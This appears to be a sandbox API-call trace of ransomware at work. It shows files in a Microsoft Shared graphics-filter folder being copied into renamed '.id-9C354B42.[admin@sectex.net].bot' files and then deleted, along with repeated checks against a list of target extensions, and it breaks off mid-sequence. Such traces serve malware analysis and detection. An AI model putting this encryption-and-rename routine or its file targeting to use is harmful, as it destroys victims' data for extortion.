	[0053.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.830] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.831] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.831] GetLastError () returned 0x0
	[0053.831] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x774, lpOverlapped=0x0) returned 1
	[0053.832] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x780, lpOverlapped=0x0) returned 1
	[0053.833] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.833] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0053.833] SetEndOfFile (hFile=0x170) returned 1
	[0053.833] CloseHandle (hObject=0x170) returned 1
	[0053.834] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.834] SetEndOfFile (hFile=0x22c) returned 1
	[0053.834] CloseHandle (hObject=0x22c) returned 1
	[0053.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.835] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1
	[0053.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.835] lstrlenW (lpString=".doc") returned 4
	[0053.835] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString=".docx") returned 5
	[0053.835] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1
	[0053.835] lstrlenW (lpString=".pdf") returned 4
	[0053.835] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString=".xls") returned 4
	[0053.835] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString=".xlsx") returned 5
	[0053.835] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1
	[0053.835] lstrlenW (lpString=".ppt") returned 4
	[0053.835] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.835] lstrlenW (lpString=".zip") returned 4
	[0053.835] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString=".rar") returned 4
	[0053.835] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1
	[0053.835] lstrlenW (lpString=".bz2") returned 4
	[0053.835] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1
	[0053.835] lstrlenW (lpString=".7z") returned 3
	[0053.835] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1
	[0053.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.835] lstrlenW (lpString=".dbf") returned 4
	[0053.836] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString=".1cd") returned 4
	[0053.836] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString=".jpg") returned 4
	[0053.836] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString=".doc") returned 4
	[0053.836] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString=".docx") returned 5
	[0053.836] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1
	[0053.836] lstrlenW (lpString=".pdf") returned 4
	[0053.836] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString=".xls") returned 4
	[0053.836] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString=".xlsx") returned 5
	[0053.836] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1
	[0053.836] lstrlenW (lpString=".ppt") returned 4
	[0053.836] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString=".zip") returned 4
	[0053.836] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString=".rar") returned 4
	[0053.836] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString=".bz2") returned 4
	[0053.836] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1
	[0053.836] lstrlenW (lpString=".7z") returned 3
	[0053.836] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.836] lstrlenW (lpString=".dbf") returned 4
	[0053.836] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1
	[0053.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.837] lstrlenW (lpString=".1cd") returned 4
	[0053.837] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1
	[0053.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61
	[0053.837] lstrlenW (lpString=".jpg") returned 4
	[0053.837] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1
	[0053.837] lstrcmpiW (lpString1=".WPG", lpString2=".bot") returned 1
	[0053.837] lstrlenW (lpString="MS.WPG") returned 6
	[0053.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.837] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=1382) returned 1
	[0053.837] CloseHandle (hObject=0x22c) returned 1
	[0053.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20
	[0053.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.837] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.838] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.838] GetLastError () returned 0x0
	[0053.838] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x566, lpOverlapped=0x0) returned 1
	[0053.839] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0053.840] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.840] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0053.840] SetEndOfFile (hFile=0x170) returned 1
	[0053.840] CloseHandle (hObject=0x170) returned 1
	[0053.841] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.841] SetEndOfFile (hFile=0x22c) returned 1
	[0053.841] CloseHandle (hObject=0x22c) returned 1
	[0053.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.842] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 1
	[0053.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.842] lstrlenW (lpString=".doc") returned 4
	[0053.842] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1
	[0053.842] lstrlenW (lpString=".docx") returned 5
	[0053.842] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1
	[0053.842] lstrlenW (lpString=".pdf") returned 4
	[0053.842] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1
	[0053.842] lstrlenW (lpString=".xls") returned 4
	[0053.842] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1
	[0053.842] lstrlenW (lpString=".xlsx") returned 5
	[0053.842] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1
	[0053.842] lstrlenW (lpString=".ppt") returned 4
	[0053.842] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1
	[0053.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".zip") returned 4
	[0053.843] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1
	[0053.843] lstrlenW (lpString=".rar") returned 4
	[0053.843] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString=".bz2") returned 4
	[0053.843] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString=".7z") returned 3
	[0053.843] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".dbf") returned 4
	[0053.843] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".1cd") returned 4
	[0053.843] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".jpg") returned 4
	[0053.843] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".doc") returned 4
	[0053.843] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString=".docx") returned 5
	[0053.843] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1
	[0053.843] lstrlenW (lpString=".pdf") returned 4
	[0053.843] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString=".xls") returned 4
	[0053.843] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1
	[0053.843] lstrlenW (lpString=".xlsx") returned 5
	[0053.843] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1
	[0053.843] lstrlenW (lpString=".ppt") returned 4
	[0053.843] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1
	[0053.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.843] lstrlenW (lpString=".zip") returned 4
	[0053.843] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1
	[0053.844] lstrlenW (lpString=".rar") returned 4
	[0053.844] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1
	[0053.844] lstrlenW (lpString=".bz2") returned 4
	[0053.844] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1
	[0053.844] lstrlenW (lpString=".7z") returned 3
	[0053.844] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1
	[0053.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.844] lstrlenW (lpString=".dbf") returned 4
	[0053.844] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1
	[0053.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.844] lstrlenW (lpString=".1cd") returned 4
	[0053.844] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1
	[0053.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61
	[0053.844] lstrlenW (lpString=".jpg") returned 4
	[0053.844] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1
	[0053.844] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0053.844] lstrlenW (lpString="PICTIM32.FLT") returned 12
	[0053.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.844] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=73080) returned 1
	[0053.844] CloseHandle (hObject=0x22c) returned 1
	[0053.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20
	[0053.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.845] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.845] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.845] GetLastError () returned 0x0
	[0053.845] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x11d78, lpOverlapped=0x0) returned 1
	[0053.847] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x11d80, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x11d80, lpOverlapped=0x0) returned 1
	[0053.849] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.849] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.849] SetEndOfFile (hFile=0x170) returned 1
	[0053.849] CloseHandle (hObject=0x170) returned 1
	[0053.850] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.850] SetEndOfFile (hFile=0x22c) returned 1
	[0053.851] CloseHandle (hObject=0x22c) returned 1
	[0053.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.851] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 1
	[0053.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.851] lstrlenW (lpString=".doc") returned 4
	[0053.851] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.851] lstrlenW (lpString=".docx") returned 5
	[0053.852] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.852] lstrlenW (lpString=".pdf") returned 4
	[0053.852] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString=".xls") returned 4
	[0053.852] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString=".xlsx") returned 5
	[0053.852] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.852] lstrlenW (lpString=".ppt") returned 4
	[0053.852] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString=".zip") returned 4
	[0053.852] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString=".rar") returned 4
	[0053.852] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString=".bz2") returned 4
	[0053.852] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.852] lstrlenW (lpString=".7z") returned 3
	[0053.852] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString=".dbf") returned 4
	[0053.852] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString=".1cd") returned 4
	[0053.852] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString=".jpg") returned 4
	[0053.852] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.852] lstrlenW (lpString=".doc") returned 4
	[0053.852] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.852] lstrlenW (lpString=".docx") returned 5
	[0053.852] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.852] lstrlenW (lpString=".pdf") returned 4
	[0053.853] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.853] lstrlenW (lpString=".xls") returned 4
	[0053.853] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.853] lstrlenW (lpString=".xlsx") returned 5
	[0053.853] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.853] lstrlenW (lpString=".ppt") returned 4
	[0053.853] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.853] lstrlenW (lpString=".zip") returned 4
	[0053.853] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.853] lstrlenW (lpString=".rar") returned 4
	[0053.853] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.853] lstrlenW (lpString=".bz2") returned 4
	[0053.853] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.853] lstrlenW (lpString=".7z") returned 3
	[0053.853] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.853] lstrlenW (lpString=".dbf") returned 4
	[0053.853] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.853] lstrlenW (lpString=".1cd") returned 4
	[0053.853] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67
	[0053.853] lstrlenW (lpString=".jpg") returned 4
	[0053.853] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.853] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0053.853] lstrlenW (lpString="PNG32.FLT") returned 9
	[0053.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.854] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=302976) returned 1
	[0053.854] CloseHandle (hObject=0x22c) returned 1
	[0053.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 0x20
	[0053.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.854] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
